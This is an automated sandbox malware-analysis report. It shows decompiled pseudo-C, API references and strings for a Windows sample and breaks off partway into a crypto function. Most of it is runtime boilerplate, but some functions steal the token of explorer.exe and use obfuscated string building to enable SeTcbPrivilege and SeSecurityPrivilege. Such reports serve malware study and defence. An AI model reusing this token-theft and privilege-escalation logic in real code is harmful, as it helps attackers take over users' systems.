Part of subcall function 00246ECD: GetLastError.KERNEL32(?,?,0024B527,?,00000000,?,00000000,?,0024B54E,?,00000007,?,?,0024B96B,?,?), ref: 00246EF5

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0024A507

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024629D, Relevance: 2.6, APIs: 2, Instructions: 59

C-Code - Quality: 82%

			E0024629D(signed int __eax, void* __ecx, void* __edx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				void* _t16;
				char** _t17;
				short* _t20;
				void* _t21;

				_t16 = __edx;
				_t13 = __ecx;
				_t17 =  *0x261950; // 0x57c160
				if(_t17 != 0) {
					_t10 = 0;
					while( *_t17 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t20 = E00246F55(_t13, _t11, 2);
							_pop(_t13);
							if(_t20 == 0) {
								L10:
								_t2 = E00246ECD(_t20);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t17, 0xffffffff, _t20, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t20); // executed
									E0024ABB0(_t13, _t16); // executed
									E00246ECD(0);
									_t21 = _t21 + 0xc;
									_t17 =  &(_t17[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0024629d
0x0024629d
0x002462a0
0x002462a8
0x002462b1
0x00246300
0x002462bd
0x002462c3
0x002462c7
0x00246311
0x00246311
0x002462c9
0x002462d1
0x002462d4
0x002462d7
0x0024630a
0x0024630b
0x00000000
0x002462d9
0x002462df
0x002462eb
0x00000000
0x002462ed
0x002462ed
0x002462ee
0x002462ef
0x002462f5
0x002462fa
0x002462fd
0x00000000
0x002462fd
0x002462eb
0x002462d7
0x00246306
0x00246309
0x00000000
0x00246309
0x00246304
0x00000000
0x002462aa
0x002462ae
0x002462ae
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,0057C160,000000FF,00000000,00000000,?,?,?,00245F69), ref: 002462BD

Part of subcall function 00246F55: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00248462,00000001,00000364,?,?,?,00247BF4,00246F4A,?,?,002429E9,?), ref: 00246F96

MultiByteToWideChar.KERNEL32(00000000,00000000,0057C160,000000FF,00000000,00000000,?,?,?,00245F69), ref: 002462E3

Part of subcall function 00246ECD: HeapFree.KERNEL32(00000000,00000000), ref: 00246EE3
Part of subcall function 00246ECD: GetLastError.KERNEL32(?,?,0024B527,?,00000000,?,00000000,?,0024B54E,?,00000007,?,?,0024B96B,?,?), ref: 00246EF5

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00242AE8, Relevance: 1.6, APIs: 1, Instructions: 101

C-Code - Quality: 85%

			E00242AE8(void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				void* _t10;
				intOrPtr _t12;
				signed short _t17;
				void* _t20;
				char _t21;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				char _t34;
				void* _t35;
				intOrPtr* _t39;
				void* _t43;
				intOrPtr _t47;
				void* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				void* _t52;
				intOrPtr* _t53;
				void* _t54;

				_t49 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t35 = __ecx;
				E00243340(__edx, 0x259d70, 0x14);
				_t10 = E00242DEF(_t35, __edx, 1); // executed
				if(_t10 != 0) {
					L2:
					_t34 = 0;
					 *((char*)(_t54 - 0x19)) = 0;
					 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
					 *((char*)(_t54 - 0x24)) = E00242DBA();
					_t12 =  *0x261420; // 0x2
					if(_t12 == 1) {
						goto L1;
					}
					if(_t12 != 0) {
						_t34 = 1;
						 *((char*)(_t54 - 0x19)) = 1;
						L8:
						E00242F49( *((intOrPtr*)(_t54 - 0x24)));
						_pop(_t39);
						_t50 = E002430E1();
						__eflags =  *_t50;
						if(__eflags != 0) {
							_t29 = E00242EBF(__eflags);
							_t39 = _t50;
							__eflags = _t29;
							if(_t29 != 0) {
								_t53 =  *_t50;
								_t39 = _t53;
								L0024332D();
								 *_t53(0, 2, 0);
							}
						}
						_t51 = E002430E7();
						__eflags =  *_t51;
						if(__eflags != 0) {
							_t27 = E00242EBF(__eflags);
							_t39 = _t51;
							__eflags = _t27;
							if(_t27 != 0) {
								E00246711(_t34, _t46, 0, _t51,  *_t51);
								_pop(_t39);
							}
						}
						_t17 = E00243208();
						_t20 = E00241ECF(_t46, __eflags, 0x240000, 0, E00246403(_t39), _t17 & 0x0000ffff); // executed
						_t52 = _t20;
						_t21 = E0024323E();
						__eflags = _t21;
						if(_t21 == 0) {
							E00246749(_t52); // executed
						}
						__eflags = _t34;
						if(_t34 == 0) {
							E002466EC();
						}
						E00242F66(_t39, 1, 0);
						 *(_t54 - 4) = 0xfffffffe;
						L19:
						return E00243386(_t46);
					}
					 *0x261420 = 1;
					_t31 = E002464B2(1, _t47, _t49, 0x254168, 0x254180); // executed
					_pop(_t43);
					if(_t31 == 0) {
						E00246456(0, _t43, _t47, _t49, 0x25415c, 0x254164); // executed
						 *0x261420 = 2;
						goto L8;
					} else {
						 *(_t54 - 4) = 0xfffffffe;
						goto L19;
					}
				}
				L1:
				E002430ED(_t46, _t47, 7);
				goto L2;
			}

0x00242ae8
0x00242ae8
0x00242ae8
0x00242ae8
0x00242aef
0x00242af6
0x00242afe
0x00242b07
0x00242b07
0x00242b09
0x00242b0c
0x00242b15
0x00242b18
0x00242b22
0x00000000
0x00000000
0x00242b26
0x00242b71
0x00242b73
0x00242b76
0x00242b79
0x00242b7e
0x00242b84
0x00242b88
0x00242b8a
0x00242b8d
0x00242b92
0x00242b93
0x00242b95
0x00242b9b
0x00242b9d
0x00242b9f
0x00242ba4
0x00242ba4
0x00242b95
0x00242bab
0x00242bad
0x00242baf
0x00242bb2
0x00242bb7
0x00242bb8
0x00242bba
0x00242bbe
0x00242bc3
0x00242bc3
0x00242bba
0x00242bc4
0x00242bd9
0x00242bde
0x00242be0
0x00242be5
0x00242be7
0x00242bea
0x00242bea
0x00242bef
0x00242bf1
0x00242bf3
0x00242bf3
0x00242bfb
0x00242c02
0x00242c4a
0x00242c4f
0x00242c4f
0x00242b28
0x00242b38
0x00242b3e
0x00242b41
0x00242b5e
0x00242b65
0x00000000
0x00242b43
0x00242b43
0x00000000
0x00242b4a
0x00242b41
0x00242b00
0x00242b02
0x00000000

APIs

Part of subcall function 002430ED: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002430FA
Part of subcall function 002430ED: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 002431C2
Part of subcall function 002430ED: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002431E1
Part of subcall function 002430ED: UnhandledExceptionFilter.KERNEL32(?), ref: 002431EB

___scrt_get_show_window_mode.LIBCMT ref: 00242BC4

Part of subcall function 00243208: GetStartupInfoW.KERNEL32(?), ref: 00243222

Part of subcall function 0024323E: GetModuleHandleW.KERNEL32(00000000,00246522,00259EA0,0000000C,0024670C,00000000,00000002,00000000,?,00246E72,00000003,00248430), ref: 00243240

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024ABD5, Relevance: 1.6, APIs: 1, Instructions: 65
library

C-Code - Quality: 90%

			E0024ABD5(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x261d80 + _a4 * 4;
				_t27 =  *0x25b018; // 0x6083b07a
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x25b018; // 0x6083b07a
							goto L13;
						}
						 *_t20 = E00243FD3(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E0024AC71( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x25b018; // 0x6083b07a
						goto L7;
					}
					_t27 =  *0x25b018; // 0x6083b07a
					goto L8;
				}
				L2:
				return _t33;
			}

0x0024abe0
0x0024abe9
0x0024abef
0x0024abf9
0x0024abfb
0x0024abff
0x0024ac6a
0x00000000
0x0024ac6a
0x0024ac03
0x0024ac09
0x0024ac0f
0x0024ac2b
0x0024ac2b
0x0024ac2d
0x0024ac2f
0x0024ac5a
0x0024ac5c
0x0024ac64
0x0024ac68
0x00000000
0x0024ac68
0x0024ac3b
0x0024ac3f
0x0024ac54
0x00000000
0x0024ac54
0x0024ac48
0x00000000
0x00000000
0x00000000
0x00000000
0x0024ac11
0x0024ac11
0x0024ac13
0x0024ac1b
0x00000000
0x00000000
0x0024ac1d
0x0024ac23
0x00000000
0x00000000
0x0024ac25
0x00000000
0x0024ac25
0x0024ac4c
0x00000000
0x0024ac4c
0x0024ac05
0x00000000

APIs

GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364,?,0024847F,00000000), ref: 0024AC35

Part of subcall function 0024AC71: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,002410DD,00000000,00000000,?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue), ref: 0024ACA3
Part of subcall function 0024AC71: GetLastError.KERNEL32(?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364,?,0024847F), ref: 0024ACAF
Part of subcall function 0024AC71: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000), ref: 0024ACBD
Part of subcall function 0024AC71: FreeLibrary.KERNEL32(00000000,?,0024AC18,002410DD,00000000,00000000,00000000,?,0024AE89,00000006,FlsSetValue,002557E8,002557F0,00000000,00000364), ref: 0024ACDF

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00246F55, Relevance: 1.5, APIs: 1, Instructions: 39

C-Code - Quality: 95%

			E00246F55(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x261e10, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0024685B();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00247BEF())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0024594C(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00246f55
0x00246f5b
0x00246f60
0x00246f6e
0x00246f6e
0x00246f74
0x00246f76
0x00246f76
0x00246f8d
0x00246f96
0x00246f9e
0x00000000
0x00000000
0x00246f7e
0x00246f80
0x00246fa2
0x00246fa7
0x00246fad
0x00000000
0x00246fad
0x00246f83
0x00246f88
0x00246f89
0x00246f8b
0x00000000
0x00000000
0x00246f8b
0x00000000
0x00246f8d
0x00246f66
0x00246f67
0x00246f6c
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00248462,00000001,00000364,?,?,?,00247BF4,00246F4A,?,?,002429E9,?), ref: 00246F96

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00246F07, Relevance: 1.5, APIs: 1, Instructions: 32

C-Code - Quality: 94%

			E00246F07(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = _a4;
				if(_t9 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00247BEF())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t9 == 0) {
					_t9 = _t9 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x261e10, 0, _t9); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0024685B();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0024594C(_t7, _t8, _t9, __eflags, _t9);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00246f07
0x00246f0d
0x00246f13
0x00246f45
0x00246f4a
0x00246f50
0x00000000
0x00246f50
0x00246f17
0x00246f19
0x00246f19
0x00246f30
0x00246f39
0x00246f41
0x00000000
0x00000000
0x00246f21
0x00246f23
0x00000000
0x00000000
0x00246f26
0x00246f2b
0x00246f2c
0x00246f2e
0x00000000
0x00000000
0x00246f2e
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,002429E9,?,?,002410DD,00000010), ref: 00246F39

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00242C50, Relevance: 1.5, APIs: 1, Instructions: 2

C-Code - Quality: 85%

			_entry_(void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr _t13;
				signed short _t18;
				void* _t21;
				char _t22;
				char _t28;
				intOrPtr _t30;
				void* _t32;
				char _t35;
				void* _t36;
				intOrPtr* _t40;
				void* _t44;
				intOrPtr _t48;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;

				_t50 = __esi;
				_t48 = __edi;
				_t47 = __edx;
				_t36 = __ecx;
				E00242FDE(); // executed
				E00243340(__edx, 0x259d70, 0x14);
				_t11 = E00242DEF(_t36, __edx, 1); // executed
				if(_t11 != 0) {
					L3:
					_t35 = 0;
					 *((char*)(_t55 - 0x19)) = 0;
					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
					 *((char*)(_t55 - 0x24)) = E00242DBA();
					_t13 =  *0x261420; // 0x2
					if(_t13 == 1) {
						goto L2;
					}
					if(_t13 != 0) {
						_t35 = 1;
						 *((char*)(_t55 - 0x19)) = 1;
						L9:
						E00242F49( *((intOrPtr*)(_t55 - 0x24)));
						_pop(_t40);
						_t51 = E002430E1();
						__eflags =  *_t51;
						if(__eflags != 0) {
							_t30 = E00242EBF(__eflags);
							_t40 = _t51;
							__eflags = _t30;
							if(_t30 != 0) {
								_t54 =  *_t51;
								_t40 = _t54;
								L0024332D();
								 *_t54(0, 2, 0);
							}
						}
						_t52 = E002430E7();
						__eflags =  *_t52;
						if(__eflags != 0) {
							_t28 = E00242EBF(__eflags);
							_t40 = _t52;
							__eflags = _t28;
							if(_t28 != 0) {
								E00246711(_t35, _t47, 0, _t52,  *_t52);
								_pop(_t40);
							}
						}
						_t18 = E00243208();
						_t21 = E00241ECF(_t47, __eflags, 0x240000, 0, E00246403(_t40), _t18 & 0x0000ffff); // executed
						_t53 = _t21;
						_t22 = E0024323E();
						__eflags = _t22;
						if(_t22 == 0) {
							E00246749(_t53); // executed
						}
						__eflags = _t35;
						if(_t35 == 0) {
							E002466EC();
						}
						E00242F66(_t40, 1, 0);
						 *(_t55 - 4) = 0xfffffffe;
						L20:
						return E00243386(_t47);
					}
					 *0x261420 = 1;
					_t32 = E002464B2(1, _t48, _t50, 0x254168, 0x254180); // executed
					_pop(_t44);
					if(_t32 == 0) {
						E00246456(0, _t44, _t48, _t50, 0x25415c, 0x254164); // executed
						 *0x261420 = 2;
						goto L9;
					}
					 *(_t55 - 4) = 0xfffffffe;
					goto L20;
				} else {
					L2:
					E002430ED(_t47, _t48, 7);
					goto L3;
				}
			}

0x00242c50
0x00242c50
0x00242c50
0x00242c50
0x00242c50
0x00242aef
0x00242af6
0x00242afe
0x00242b07
0x00242b07
0x00242b09
0x00242b0c
0x00242b15
0x00242b18
0x00242b22
0x00000000
0x00000000
0x00242b26
0x00242b71
0x00242b73
0x00242b76
0x00242b79
0x00242b7e
0x00242b84
0x00242b88
0x00242b8a
0x00242b8d
0x00242b92
0x00242b93
0x00242b95
0x00242b9b
0x00242b9d
0x00242b9f
0x00242ba4
0x00242ba4
0x00242b95
0x00242bab
0x00242bad
0x00242baf
0x00242bb2
0x00242bb7
0x00242bb8
0x00242bba
0x00242bbe
0x00242bc3
0x00242bc3
0x00242bba
0x00242bc4
0x00242bd9
0x00242bde
0x00242be0
0x00242be5
0x00242be7
0x00242bea
0x00242bea
0x00242bef
0x00242bf1
0x00242bf3
0x00242bf3
0x00242bfb
0x00242c02
0x00242c4a
0x00242c4f
0x00242c4f
0x00242b28
0x00242b38
0x00242b3e
0x00242b41
0x00242b5e
0x00242b65
0x00000000
0x00242b65
0x00242b43
0x00000000
0x00242b00
0x00242b00
0x00242b02
0x00000000
0x00242b02

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Non-executed Functions

Function 00241C3D, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 67
string

C-Code - Quality: 82%

			E00241C3D() {
				signed int _v8;
				void* _v12;
				short _v532;
				signed int _v560;
				void* _v568;
				struct tagPROCESSENTRY32W* _t14;
				int _t22;
				void* _t28;
				void* _t29;

				_v8 = _v8 & 0x00000000;
				_t28 = CreateToolhelp32Snapshot(2, 0);
				if(_t28 == 0xffffffff) {
					L12:
					return 0;
				}
				do {
					_t14 =  &_v568;
					_v568 = 0x22c;
					Process32FirstW(_t28, _t14);
					while(_t14 != 0) {
						if(lstrcmpiW(L"explorer.exe",  &_v532) == 0) {
							_v8 = _v560;
							L8:
							CloseHandle(_t28);
							_t29 = OpenProcess(0x400, 0, _v8);
							if(_t29 == 0xffffffff) {
								goto L11;
							}
							_t22 = OpenProcessToken(_t29, 0xf01ff,  &_v12);
							_push(_t29);
							if(_t22 != 0) {
								CloseHandle();
								return _v12;
							}
							CloseHandle();
							goto L11;
						}
						_t14 = Process32NextW(_t28,  &_v568);
					}
					goto L8;
					L11:
					_t28 = CreateToolhelp32Snapshot(2, 0);
				} while (_t28 != 0xffffffff);
				goto L12;
			}

0x00241c46
0x00241c56
0x00241c5b
0x00241cfa
0x00000000
0x00241cfa
0x00241c67
0x00241c67
0x00241c6d
0x00241c79
0x00241ca5
0x00241c95
0x00241cb1
0x00241cb4
0x00241cb5
0x00241cc7
0x00241ccc
0x00000000
0x00000000
0x00241cd8
0x00241cde
0x00241ce1
0x00241d02
0x00000000
0x00241d04
0x00241ce3
0x00000000
0x00241ce3
0x00241c9f
0x00241c9f
0x00000000
0x00241ce5
0x00241cef
0x00241cf1
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00241C50
Process32FirstW.KERNEL32(00000000,?), ref: 00241C79
lstrcmpiW.KERNEL32(explorer.exe,?,?,?), ref: 00241C8D
Process32NextW.KERNEL32(00000000,0000022C), ref: 00241C9F
CloseHandle.KERNEL32(00000000), ref: 00241CB5
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?), ref: 00241CC1
OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?), ref: 00241CD8
CloseHandle.KERNEL32(00000000), ref: 00241CE3
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00241CE9
CloseHandle.KERNEL32(00000000), ref: 00241D02

Strings

TBtuWtu, xrefs: 00241CD8
explorer.exe, xrefs: 00241C88

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00241957, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 163
library

C-Code - Quality: 56%

			E00241957() {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				intOrPtr _v78;
				char _v79;
				char _v80;
				char _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				struct _TOKEN_PRIVILEGES _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				struct _TOKEN_PRIVILEGES _v128;
				char _v132;
				char _v148;
				short _t56;
				short _t57;
				short _t58;
				struct HINSTANCE__* _t61;
				_Unknown_base(*)()* _t62;
				short _t66;
				short _t67;
				struct HINSTANCE__* _t70;
				intOrPtr _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t91;
				short _t92;
				short _t94;
				short _t95;
				short _t96;
				short _t97;
				short _t98;
				short _t99;
				char _t100;
				char _t106;
				intOrPtr* _t108;

				_t56 = 0x41;
				_v44 = _t56;
				_t57 = 0x64;
				_t86 = 0x76;
				_v40 = _t86;
				_t87 = 0x61;
				_v38 = _t87;
				_t88 = 0x70;
				asm("movaps xmm0, [0x259850]");
				_v8 = _v8 & 0x00000000;
				_v36 = _t88;
				_t89 = 0x69;
				_v34 = _t89;
				_t90 = 0x33;
				_v32 = _t90;
				_t91 = 0x32;
				_v30 = _t91;
				_t92 = 0x2e;
				_v42 = _t57;
				_v26 = _t57;
				_t58 = 0x6c;
				_v24 = _t58;
				_v22 = _t58;
				_v20 = 0;
				_v132 = 0;
				_v28 = _t92;
				asm("movups [ebp-0x90], xmm0");
				_t61 = LoadLibraryW( &_v44);
				if(_t61 != 0) {
					_t62 = GetProcAddress(_t61,  &_v148);
					 *_t62(GetCurrentProcess(), 0xf01ff,  &_v8);
					_t66 = 0x41;
					_v72 = _t66;
					_t67 = 0x64;
					_t94 = 0x76;
					_t106 = 0x61;
					asm("movaps xmm0, [0x259840]");
					_v68 = _t94;
					_t95 = 0x70;
					_v64 = _t95;
					_t96 = 0x69;
					_v62 = _t96;
					_t97 = 0x33;
					_v60 = _t97;
					_t98 = 0x32;
					_v58 = _t98;
					_t99 = 0x2e;
					_v70 = _t67;
					_v54 = _t67;
					_v56 = _t99;
					_t100 = 0x6c;
					_v48 = 0;
					_v66 = _t106;
					_v52 = _t100;
					_v50 = _t100;
					asm("movups [ebp-0x5c], xmm0");
					_v80 = _t106;
					_v79 = _t100;
					_v78 = 0x576575;
					_t70 = LoadLibraryW( &_v72);
					if(_t70 == 0) {
						goto L1;
					}
					_t108 = GetProcAddress(_t70,  &_v96);
					 *_t108(0, L"SeSecurityPrivilege",  &_v16);
					_t85 = 2;
					_v112.Privileges = _v16;
					_v104 = _v12;
					_v112.PrivilegeCount = 1;
					_v100 = LoadLibraryW;
					AdjustTokenPrivileges(_v8, 0,  &_v112, 0x10, 0, 0);
					 *_t108(0, L"SeTcbPrivilege",  &_v16);
					_v128.Privileges = _v16;
					_v120 = _v12;
					_v128.PrivilegeCount = 1;
					_v116 = _t85;
					AdjustTokenPrivileges(_v8, 0,  &_v128, 0x10, 0, 0);
					return 1;
				}
				L1:
				return 0;
			}

0x00241965
0x00241968
0x0024196c
0x0024196f
0x00241972
0x00241976
0x00241979
0x0024197d
0x00241980
0x00241987
0x00241991
0x00241995
0x00241998
0x0024199c
0x0024199f
0x002419a3
0x002419a6
0x002419aa
0x002419ab
0x002419af
0x002419b5
0x002419b6
0x002419ba
0x002419c0
0x002419c4
0x002419cb
0x002419cf
0x002419d6
0x002419da
0x002419f1
0x00241a05
0x00241a09
0x00241a0c
0x00241a10
0x00241a13
0x00241a16
0x00241a19
0x00241a20
0x00241a24
0x00241a27
0x00241a2b
0x00241a2e
0x00241a32
0x00241a35
0x00241a39
0x00241a3c
0x00241a40
0x00241a41
0x00241a45
0x00241a4d
0x00241a51
0x00241a52
0x00241a5a
0x00241a5e
0x00241a62
0x00241a66
0x00241a6a
0x00241a6d
0x00241a70
0x00241a77
0x00241a7b
0x00000000
0x00000000
0x00241a88
0x00241a95
0x00241aa5
0x00241aa6
0x00241aaf
0x00241aba
0x00241ac1
0x00241ac4
0x00241ad1
0x00241ad9
0x00241ae2
0x00241aed
0x00241af4
0x00241af7
0x00000000
0x00241af9
0x002419dc
0x00000000

APIs

LoadLibraryW.KERNEL32(?), ref: 002419D6
GetProcAddress.KERNEL32(00000000,?,?,?,?), ref: 002419F1
GetCurrentProcess.KERNEL32(000F01FF,00000000,?,?,?), ref: 002419FE
LoadLibraryW.KERNEL32(?), ref: 00241A77
GetProcAddress.KERNEL32(00000000,?,?,?,?), ref: 00241A86
AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000,?,?,?), ref: 00241AC4
AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000,?,?,?), ref: 00241AF7

Strings

SeTcbPrivilege, xrefs: 00241ACA
SeSecurityPrivilege, xrefs: 00241A8E
ueW, xrefs: 00241A70
LookupPrivilegeVOpenProcessToken, xrefs: 00241A19

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024CE2E, Relevance: 6.4, Strings: 4, Instructions: 1381
Crypto

C-Code - Quality: 67%

			E0024CE2E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
